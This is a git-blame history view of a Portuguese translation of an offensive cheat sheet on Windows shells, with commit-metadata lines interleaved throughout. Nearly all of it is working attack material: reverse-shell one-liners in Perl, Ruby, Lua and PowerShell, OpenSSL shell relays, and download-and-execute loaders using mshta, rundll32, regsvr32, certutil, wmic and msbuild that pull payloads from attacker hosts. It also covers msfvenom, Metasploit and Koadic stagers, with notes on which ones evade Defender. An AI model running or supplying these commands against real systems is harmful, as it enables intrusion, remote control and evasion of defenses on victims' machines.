__after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Perl
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
 								Perl é uma linguagem de programação amplamente utilizada em hacking e pentesting devido à sua capacidade de executar comandos do sistema operacional e interagir com arquivos de forma eficiente. É comum ver scripts Perl sendo usados para criar backdoors e shells em sistemas Windows comprometidos.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 								perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Ruby
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Windows
 								ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Lua
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## OpenSSH
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Atacante (Kali)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Vítima
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Linux
 								openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								#Windows
 								openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
 								powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 23:05:52 +00:00
+								Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **powershell.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								powershell -exec bypass -f \\webdavserver\folder\payload.ps1
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
 								Carga gravada no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Mshta
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **mshta.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga útil escrita no disco: **cache local do IE**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								mshta http://webserver/payload.hta
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **mshta.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga útil escrita no disco: **cache local do IE**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								mshta \\webdavserver\folder\payload.hta
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga escrita no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								#### **Exemplo de shell reverso hta-psh (usa hta para baixar e executar backdoor PS)**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								#### Exemplo hta
 								[**Daqui**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<html>
 								<head>
 								<HTA:APPLICATION ID="HelloExample">
 								<script language="jscript">
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								var c = "cmd.exe /c calc.exe";
 								new ActiveXObject('WScript.Shell').Run(c);
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</script>
 								</head>
 								<body>
 								<script>self.close();</script>
 								</body>
 								</html>
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								#### **mshta - sct**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
 								[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<?XML version="1.0"?>
 								<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
 								<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
 								<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
 								<scriptlet>
 								<public>
 								</public>
 								<script language="JScript">
 								<![CDATA[
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								]]>
 								</script>
 								</scriptlet>
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								#### **Mshta - Metasploit**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								use exploit/windows/misc/hta_server
 								msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
 								msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
 								msf exploit(windows/misc/hta_server) > exploit
 								```
 								```bash
 								Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Detectado pelo defensor**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## **Rundll32**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								[**Exemplo de Dll olá mundo**](https://github.com/carterjones/hello-world-dll)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								rundll32 \\webdavserver\folder\payload.dll,entrypoint
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **rundll32.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do IE**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								**Detectado pelo defensor**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								**Rundll32 - sct**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
 								[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								<?XML version="1.0"?>
 								<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
 								<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
 								<scriptlet>
 								<public>
 								</public>
 								<script language="JScript">
 								<![CDATA[
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								]]>
 								</script>
 								</scriptlet>
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								#### **Rundll32 - Metasploit**
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								```bash
 								use windows/smb/smb_delivery
 								run
 								#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
 								```
 								**Rundll32 - Koadic**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								use stager/js/rundll32_js
 								set SRVHOST 192.168.1.107
 								set ENDPOINT sales
 								run
 								#Koadic will tell you what you need to execute inside the victim, it will be something like:
 								rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
 								```
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Regsvr32
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **regsvr32.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do IE**
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Detectado pelo defensor**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								#### Regsvr32 -sct
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
 								[**Daqui**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<?XML version="1.0"?>
 								<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
 								<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
 								<scriptlet>
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								<registration
 								progid="PoC"
 								classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
 								<script language="JScript">
 								<![CDATA[
 								var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
 								]]>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</script>
 								</registration>
 								</scriptlet>
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								#### **Regsvr32 - Metasploit**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								use multi/script/web_delivery
 								set target 3
 								set payload windows/meterpreter/reverse/tcp
 								set lhost 10.2.0.5
 								run
 								#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Certutil
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Baixe um B64dll, decodifique e execute.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Baixe um B64exe, decodifique e execute-o.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Detectado pelo defensor**
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-14 14:49:16 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								***
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
 								## **Cscript/Wscript**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
 								```
 								**Cscript - Metasploit**
 								```bash
 								msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Detectado pelo defensor**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## PS-Bat
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								\\webdavserver\folder\batchfile.bat
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
 								impacket-smbserver -smb2support kali `pwd`
 								```
 								```bash
 								\\10.8.0.3\kali\shell.bat
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								**Detectado pelo defensor**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## **MSIExec**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Atacante
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 385 pages modified
											
										
										
											2020-11-11 00:39:24 +00:00
+								msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								python -m SimpleHTTPServer 80
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Vítima:
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Detectado**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## **Wmic**
 								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								wmic os get /format:"https://webserver/payload.xsl"
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **wmic.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Carga gravada no disco: **cache local do IE**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Exemplo de arquivo xsl [aqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<?xml version='1.0'?>
 								<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
 								<output method="text"/>
-												Translated ['generic-methodologies-and-resources/shells/windows.md', 'ma

											
										
										
											2023-07-13 10:23:45 +00:00
+								<ms:script implements-prefix="user" language="JScript">
 								<![CDATA[
 								var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
 								]]>
 								</ms:script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</stylesheet>
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Não detectado**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## Msbuild
 								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Processo realizando chamada de rede: **svchost.exe**\
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Payload escrito no disco: **cache local do cliente WebDAV**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Você pode usar essa técnica para burlar a Lista Branca de Aplicativos e as restrições do Powershell.exe. Pois você será solicitado com um shell do PS.\
 								Basta baixar e executar isso: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Não detectado**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								## **CSC**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Compilar código C# na máquina da vítima.
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
 								```
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:45:11 +00:00
+								Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

